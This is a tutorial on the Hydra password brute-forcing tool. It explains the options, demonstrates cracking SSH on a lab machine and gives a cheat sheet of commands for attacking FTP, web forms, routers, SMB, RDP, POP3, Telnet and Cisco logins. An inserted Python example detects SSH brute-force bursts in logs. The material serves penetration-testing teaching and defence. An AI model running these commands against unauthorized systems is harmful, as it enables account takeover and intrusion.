Hydra
Remember Hydra, Captain America's villain?
The penetration testing tool introduced today has the same name.
Hydra is an open-source brute-force password cracking tool from the well-known organization THC, and it is very powerful.
It is installed by default on Kali and supports online cracking of almost all protocols.
Whether a password can be cracked depends on the strength of the dictionary and the performance of the computer.
Let's go straight to how it is used.
Usage
Syntax:
    hydra [parameters] IP service
Parameters:
    -l LOGIN   Lowercase: specifies a single user name to crack.
    -L FILE    Uppercase: specifies the user name dictionary.
    -p PASS    Lowercase: specifies a single password. Rarely used; a password dictionary is normally used instead.
    -P FILE    Uppercase: specifies the password dictionary.
    -e ns      Additional checks: n tries an empty password, s tries the specified account name as the password.
    -M FILE    Specifies a file listing the target IP addresses, to crack in batches.
    -o FILE    Specifies the output file.
    -f         Stops cracking when the first login name and password pair is found.
    -t TASKS   Specifies the number of concurrent threads. Default is 16.
    -w TIME    Specifies the maximum timeout.
    -v / -V    Displays the detailed process.
    -R         Continues a previous task (an interrupted run can be continued next time with hydra -R, which reads the hydra.restore file).
    -x         Specifies how passwords are generated instead of reading them from a dictionary.
Service: specifies the name of the service. Supported services and protocols include Telnet, FTP, POP3, and so on.
Notes:
1. Create your own dictionaries and put them in the current directory or a specified directory.
2. The parameters can also be placed at the end, in the format hydra IP service parameters.
3. If the user name is already known, for example when cracking a web login, specify it with -l and crack only the password.
4. Drawback: if the target website's login requires a verification code, it cannot be cracked.
5. See man hydra.
6. Check the help information for a module, for example hydra -U http-form.
Case analysis
Break the SSH login password
Environment introduction
Attacking machine: Kali, with the Hydra tool installed
Target machine: 192.168.154.131, with the SSH service installed and running properly
For testing purposes, we create two simple dictionary files, as follows:
Start the brute force
Following the parameters described above, the command is assembled as follows:
    root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh
Successful cracking
Because the dictionaries are small, the password is cracked easily; in practice it may take a long time.
Test the login
Log in to the server using the obtained user name and password
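Seen from the target's side, the run above leaves a burst of failed SSH logins from one address in the sshd log. The following Python sketch is an added example, not part of the original article: it flags such bursts and any successful login that follows one. The log lines, the source address 192.168.154.130, the threshold, the window and the year are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log lines (assumed syslog format, not taken from the article).
SAMPLE_LOG = """\
Mar 10 09:15:01 target sshd[2101]: Failed password for root from 192.168.154.130 port 40112 ssh2
Mar 10 09:15:01 target sshd[2102]: Failed password for invalid user admin from 192.168.154.130 port 40114 ssh2
Mar 10 09:15:03 target sshd[2103]: Failed password for root from 192.168.154.130 port 40116 ssh2
Mar 10 09:15:03 target sshd[2104]: Failed password for invalid user admin from 192.168.154.130 port 40118 ssh2
Mar 10 09:15:05 target sshd[2105]: Failed password for root from 192.168.154.130 port 40120 ssh2
Mar 10 09:15:06 target sshd[2106]: Accepted password for root from 192.168.154.130 port 40122 ssh2
Mar 10 09:20:00 target sshd[2110]: Failed password for alice from 192.168.154.1 port 50222 ssh2
Mar 10 09:20:09 target sshd[2111]: Accepted password for alice from 192.168.154.1 port 50224 ssh2
"""

# Timestamp, result, user name and source address of a password login attempt.
LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect_bruteforce(log_text, max_failures=5, window=timedelta(seconds=60), year=2024):
    """Flag source IPs with >= max_failures failed logins inside one sliding window.

    Returns {ip: {"failures": n, "users": set, "compromised": user or None}}.
    The syslog timestamp has no year, so `year` is an assumed parameter."""
    recent = defaultdict(list)          # ip -> [(time, user)] still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        result, user, ip = m.group(2), m.group(3), m.group(4)
        if result == "Failed":
            recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window] + [(ts, user)]
            if len(recent[ip]) >= max_failures:
                alert = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised": None})
                alert["failures"] = max(alert["failures"], len(recent[ip]))
                alert["users"].update(u for _, u in recent[ip])
        elif ip in alerts:
            # A success from an already flagged address likely means a guess worked.
            alerts[ip]["compromised"] = user
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

The single mistyped password from 192.168.154.1 stays below the threshold and is not reported, while the accepted root login from the flagged address is marked as a compromised account.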
Summary of cracking various protocols
FTP Protocol cracking
To crack FTP:
    hydra -L <user name dictionary> -P <password dictionary> -t 6 -e ns <IP address> ftp -v
HTTP Protocol cracking
Crack a web login submitted with GET:
    hydra -L <user name dictionary> -P <password dictionary> -t <threads> -v -e ns <IP address> http-get /admin/
    hydra -L <user name dictionary> -P <password dictionary> -t <threads> -v -e ns -f <IP address> http-get
Crack a web login submitted with POST:
    hydra -f -l <user name> -P <password dictionary> -v -s 9900 <IP address> http-post-form "/admin/index.php?action=login:user=^USER^&pw=^PASS^:<text shown when the login fails>"
    # /admin/index.php?action=login is the login URL
    # after it comes the POST data, in which the user name and password are replaced by ^USER^ and ^PASS^
    # then comes the text that appears when the login fails
    # ... and then the cracking starts
HTTPS Protocol cracking
Crack HTTPS:
    hydra -m /index.php -l <user name> -P <password dictionary>.txt <IP address> https
Router cracking
    hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
    # -l admin is the user name to try to crack.
    # -x 6:10:1a.~!@#$%^&()-= enumerates passwords made of digits, lowercase letters and the single characters '.' and so on, 6 to 10 characters long.
    # -t 8 splits the work into 8 parallel tasks.
    # 192.168.1.1 is the router address.
    # http-get is the cracking mode (protocol).
HTTP-proxy protocol cracking
Crack http-proxy:
    hydra -l admin -P <dictionary>.txt http-proxy://<IP address>
SMB crack
Crack SMB:
    hydra -L <user name dictionary> -P <password dictionary> <IP address> smb
Windows Remote Desktop
Crack RDP (Windows remote login):
    hydra <IP address> rdp -l administrator -P <password dictionary>.txt -v
Email pop3
Crack a POP3 mailbox:
    hydra -l <user name> -P <password dictionary>.txt my.pop3.mail pop3
Telnet crack
    hydra <IP address> telnet -L <user dictionary>.txt -P <password dictionary>.txt -t 32 -s 23 -e ns -f -v
Teamspeak
    hydra -L <user name dictionary> -P <password dictionary>.txt -s <port number> -vV <IP address> teamspeak
Cisco
    hydra -P <password dictionary> <IP address> cisco
    hydra -m cloud -P <password dictionary> <IP address> cisco-enable